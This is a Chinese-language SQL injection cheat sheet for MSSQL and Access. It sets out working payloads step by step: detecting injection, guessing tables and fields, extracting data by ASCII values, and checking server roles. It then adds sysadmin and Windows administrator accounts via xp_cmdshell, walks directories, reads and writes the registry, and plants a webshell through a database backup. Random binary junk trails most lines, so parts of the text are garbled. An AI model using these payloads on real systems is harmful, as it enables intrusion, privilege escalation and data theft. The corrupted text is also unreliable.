1.判断是否有注入;and 1=1 ;and 1=2 B\r��2M`N5
2.初步判断是否是mssql ;and user>0 !?Gt5��$f�
;e4�15T���
3.注入参数是字符'and [查询条件] and ''=' 9�+�nB;vA�
��C�i�4`,�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' VdjS\VYe�,
H=��9kDP${
5.判断数据库系统 �Exe�D3Z�j
)=;GQ*<8Zs
;and (select count(*) from sysobjects)>0 mssql R�8I%C�yc�
SE.r �'J�0
;and (select count(*) from msysobjects)>0 access �dKTyh:_{�
3p6�Q�JuSB
Oq@+/UW�X�
f(:+�JH<P~
6.猜数据库 ;and (select Count(*) from [数据库名])>0 u,A�P$+Qk�
B(7�oHj.i2
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 "XfC�Lc1 T
y�$|%K3���
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �yhv(�K�I�
|tIr?nXSW3
9.(1)猜字段的ascii值(access) ug{@rt/�"Z
~~a,Fy�ko2
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ]$Pl[Vegy
x�? �tC2L
(2)猜字段的ascii值(mssql) �1��DgR�V7
WvR-0>��E�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �\(�2�w/~
I�{tY;b'w
10.测试权限结构(mssql) `-f�WN�Hs�
Y[)��b".K�
e+6mb�J7�y
�p��FgpAxl
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- q�mqWM�LfC
5�xC�4lT/U
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �s!,m,�l[P
CX?q�%o2b�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 3�9to5�s�,
6D�|�[3rXr
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- pMB�!��I9q
�L�#O�1�>�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- h��b�#Nm6
�L�vtHWt��
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- U{�i xok�
IR;l��{q&`
;and 1=(select IS_MEMBER('db_owner'));-- vZ,D�J//U,
��R��d'P�\
Gu�+�9�R�>
�2?P� H�||
11.添加mssql和系统的帐户 �2(LF �@xb
K+MSjQ�S"�
;exec master.dbo.sp_addlogin username;-- ��r5� tn'�
;exec master.dbo.sp_password null,username,password;-- X)o�xNxZ[A
m%m<-��.'-
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 0Dte�w�N{Z
jq%%�|J�.x
;exec master.dbo.xp_cmdshell 'net user username password '&hz��*yk�
Ak3cE_*�Y/
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- %��O�6r� �
!��yqe���z
;exec master.dbo.xp_cmdshell 'net user username password /add';-- "�Vh3�hnS~
p3r("\Za,�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- GsI�Vx��!
6_|i�Xs(&�
��z�^lcc7�
�m%zo? e��
12.(1)遍历目录 �+t*V7n��W
j9g�n�7LS
;create table dirs(paths varchar(100), id int) �i(T[��� �
`-t8�ag�3�
;insert dirs exec master.dbo.xp_dirtree 'c:\' �<*JFY%y�"
�/pY-how%!
;and (select top 1 paths from dirs)>0 �GDF�/0-/Z
aeZ$�Wu>]W
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �pwvzs`�[;
eH�HY.^|��
�(#kKL??W�
H�j�hg�u=
(2)遍历目录 �&~�mJ
).*
y��0vJ@ %`
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- H9;0�$Y(e-
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ;~�D$��rT�
y�FoPCA86y
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 $�%B�I8_��
�<W]
RyEg`
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 o|:�c�{pwq
n%�|og^\�0
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ��P�R���J�
8[b_�E�5!V
ES-V'[+jDy
9�|D*}OY>
13.mssql中的存储过程 e�5RF6roxO
�I(<9e"�1O
xp_regenumvalues 注册表根键, 子键 Az7
��]�qb
:�@uIEvD�?
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 (1EtC{��
m
6VUs:iO1j5
xp_regread 根键,子键,键值名 KH$|���wv�
s&h���J[$i
;exec xp_regread E1r�-$gf_�
�}��7n�o�n
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 b�5Q�|$E �
M"Dv�-#��f
xp_regwrite 根键,子键, 值名, 值类型, 值 L4D�T*(;!E
f=k_U[b�4>
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 0$A�^ .M�;
�Hf�/Z�aBn
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 JDJ"D�\85�
TAx�u�]C$P
xp_regdeletevalue 根键,子键,值名 3��Fb9\2<H
\�sB�X�S.�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 X�[<�%T}s#
ho-#Xbq#�g
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 /K�L���krW
zm��U@� �k
�SZ�2�9B��
l+#J �oc<8
14.mssql的backup创建webshell 0�iYo�&q'n
_01wRsm%2�
use model n�b<e<>L��
u,V_�j|(�e
create table cmd(str image); _t�Uh*"e�&
V&*|�%,q��
insert into cmd(str) values (''); �iYZn`O�Ax
_��9g-�D�9
backup database model to disk='c:\l.asp'; O8�OAXRt/Y
(xfh �9=.�
.TMLg(2hgv
NbC��2N)L4
15.mssql内置函数 �K�om�MzG:
MaPOmS�8?�
;and (select @@version)>0 获得Windows的版本号 fat;5�XL@�
3eg�6 CdT
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �^�T�:�L6:
�ph��}%Ay$
;and (select user_name())>0 爆当前系统的连接用户 ^@3,/dH1 t
U9Zu��D40\
;and (select db_name())>0 得到当前连接的数据库 It�7R}0Smg
X� n8&&w�"
S��R�tw���
J�z}`-�fU`
16.简洁的webshell �V�Kkvf"X�
Q�M![tZt%;
use model �o\��F�>K'
a�:8 MoH�4
create table cmd(str image); ;4U"y8PVTh
�l?QA;9_R'
insert into cmd(str) values (''); 2e��HVl.C5
9: .�m�]QN
backup database model to disk='g:\wwwtest\l.asp';
